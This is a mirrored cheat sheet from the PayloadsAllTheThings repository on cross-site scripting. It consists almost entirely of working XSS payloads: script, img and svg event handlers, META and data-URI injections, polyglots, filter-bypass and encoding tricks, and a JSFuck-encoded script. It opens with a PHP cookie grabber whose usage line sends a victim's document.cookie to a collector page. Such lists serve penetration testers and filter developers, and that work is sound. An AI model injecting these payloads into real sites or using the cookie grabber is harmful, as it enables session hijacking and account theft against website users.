mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
245 lines
10 KiB
Markdown
245 lines
10 KiB
Markdown
# Cross Site Scripting
|
||
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
||
|
||
## Exploit code or POC
|
||
|
||
Cookie grabber for XSS
|
||
```
|
||
<?php
|
||
// How to use it
|
||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
||
|
||
// Write the cookie in a file
|
||
$cookie = $_GET['c'];
|
||
$fp = fopen('cookies.txt', 'a+');
|
||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
||
fclose($fp);
|
||
|
||
?>
|
||
```
|
||
|
||
## XSS in HTML/Applications
|
||
XSS Basic
|
||
```
|
||
Basic payload
|
||
<script>alert('XSS')</script>
|
||
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
||
"><script>alert('XSS')</script>
|
||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||
|
||
Img payload
|
||
<img src=x onerror=alert('XSS');>
|
||
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
|
||
<img src=x:alert(alt) onerror=eval(src) alt=xss>
|
||
"><img src=x onerror=alert('XSS');>
|
||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||
|
||
Svg payload
|
||
<svgonload=alert(1)>
|
||
<svg/onload=alert('XSS')>
|
||
<svg/onload=alert(String.fromCharCode(88,83,83))>
|
||
<svg id=alert(1) onload=eval(id)>
|
||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||
"><svg/onload=alert(/XSS/)
|
||
```
|
||
|
||
XSS for HTML5
|
||
```
|
||
<input autofocus onfocus=alert(1)>
|
||
<select autofocus onfocus=alert(1)>
|
||
<textarea autofocus onfocus=alert(1)>
|
||
<keygen autofocus onfocus=alert(1)>
|
||
<video/poster/onerror=alert(1)>
|
||
<video><source onerror="javascript:alert(1)">
|
||
<video src=_ onloadstart="alert(1)">
|
||
<details/open/ontoggle="alert`1`"
|
||
```
|
||
|
||
|
||
XSS in META tag
|
||
```
|
||
Base64 encoded
|
||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||
|
||
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
|
||
|
||
With an additionl URL
|
||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||
```
|
||
|
||
XSS in flash application
|
||
```
|
||
\%22})))}catch(e){alert(document.domain);}//
|
||
|
||
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
|
||
|
||
"a")(({type:"ready"}));}catch(e){alert(1)}//
|
||
```
|
||
|
||
XSS in Hidden input
|
||
```
|
||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||
Use CTRL+SHIFT+X to trigger the onclick event
|
||
```
|
||
|
||
## XSS in wrappers javascript and data
|
||
XSS with javascript:
|
||
```
|
||
javascript:prompt(1)
|
||
|
||
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
|
||
|
||
javascript:confirm(1)
|
||
```
|
||
|
||
XSS with data:
|
||
```
|
||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||
```
|
||
|
||
|
||
## XSS in files
|
||
XSS in XML
|
||
```
|
||
<html>
|
||
<head></head>
|
||
<body>
|
||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||
</body>
|
||
</html>
|
||
```
|
||
|
||
|
||
XSS in SVG
|
||
```
|
||
<?xml version="1.0" standalone="no"?>
|
||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||
|
||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
||
<script type="text/javascript">
|
||
alert(document.domain);
|
||
</script>
|
||
</svg>
|
||
```
|
||
|
||
XSS in SVG (short)
|
||
```
|
||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||
```
|
||
more payloads in ./files
|
||
|
||
|
||
# Mutated XSS for Browser IE8/IE9
|
||
```
|
||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||
```
|
||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||
|
||
|
||
## Polyglot XSS
|
||
Polyglot XSS - 0xsobky
|
||
```
|
||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||
```
|
||
|
||
Polyglot XSS - Ashar Javed
|
||
```
|
||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||
```
|
||
|
||
Polyglot XSS - Mathias Karlsson
|
||
```
|
||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||
```
|
||
|
||
Polyglot XSS - Rsnake
|
||
```
|
||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||
```
|
||
|
||
|
||
## Filter Bypass and exotic payloads
|
||
|
||
Bypass quotes for string
|
||
```
|
||
String.fromCharCode(88,83,83)
|
||
```
|
||
|
||
Bypass parenthesis for string
|
||
```
|
||
alert`1`
|
||
```
|
||
|
||
```
|
||
<script>$=1,alert($)</script>
|
||
<script ~~~>confirm(1)</script ~~~>
|
||
<script>$=1,\u0061lert($)</script>
|
||
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
|
||
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
|
||
</style></scRipt><scRipt>alert(1)</scRipt>
|
||
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
|
||
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
|
||
<svg><x><script>alert('1')</x>
|
||
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
|
||
```
|
||
|
||
Using Unicode
|
||
```
|
||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||
transformed into U+003C LESSTHAN SIGN (<)
|
||
|
||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||
transformed into U+0022 QUOTATION MARK (")
|
||
|
||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||
transformed into U+0027 APOSTROPHE (')
|
||
|
||
Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
|
||
transformed into U+003C LESSTHAN SIGN (<)
|
||
|
||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||
transformed into U+0022 QUOTATION MARK (")
|
||
|
||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||
transformed into U+0027 APOSTROPHE (')
|
||
|
||
E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
|
||
%EF%BC%9E becomes >
|
||
%EF%BC%9C becomes <
|
||
|
||
Overlong UTF-8
|
||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
|
||
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
|
||
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
|
||
" = %CA%BA
|
||
' = %CA%B9
|
||
|
||
```
|
||
|
||
|
||
HTTP Parameter Pollution
|
||
```
|
||
http://target.com/something.xxx?a=val1&a=val2
|
||
ASP.NET a = val1,val2
|
||
ASP a = val1,val2
|
||
JSP a = val1
|
||
PHP a = val2
|
||
```
|
||
|
||
|
||
|
||
Use JSFuck to encode the payload (alert())
|
||
```javascript
|
||
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
|
||
|
||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||
```
|
||
|
||
|
||
## Thanks to
|
||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||
* tbm |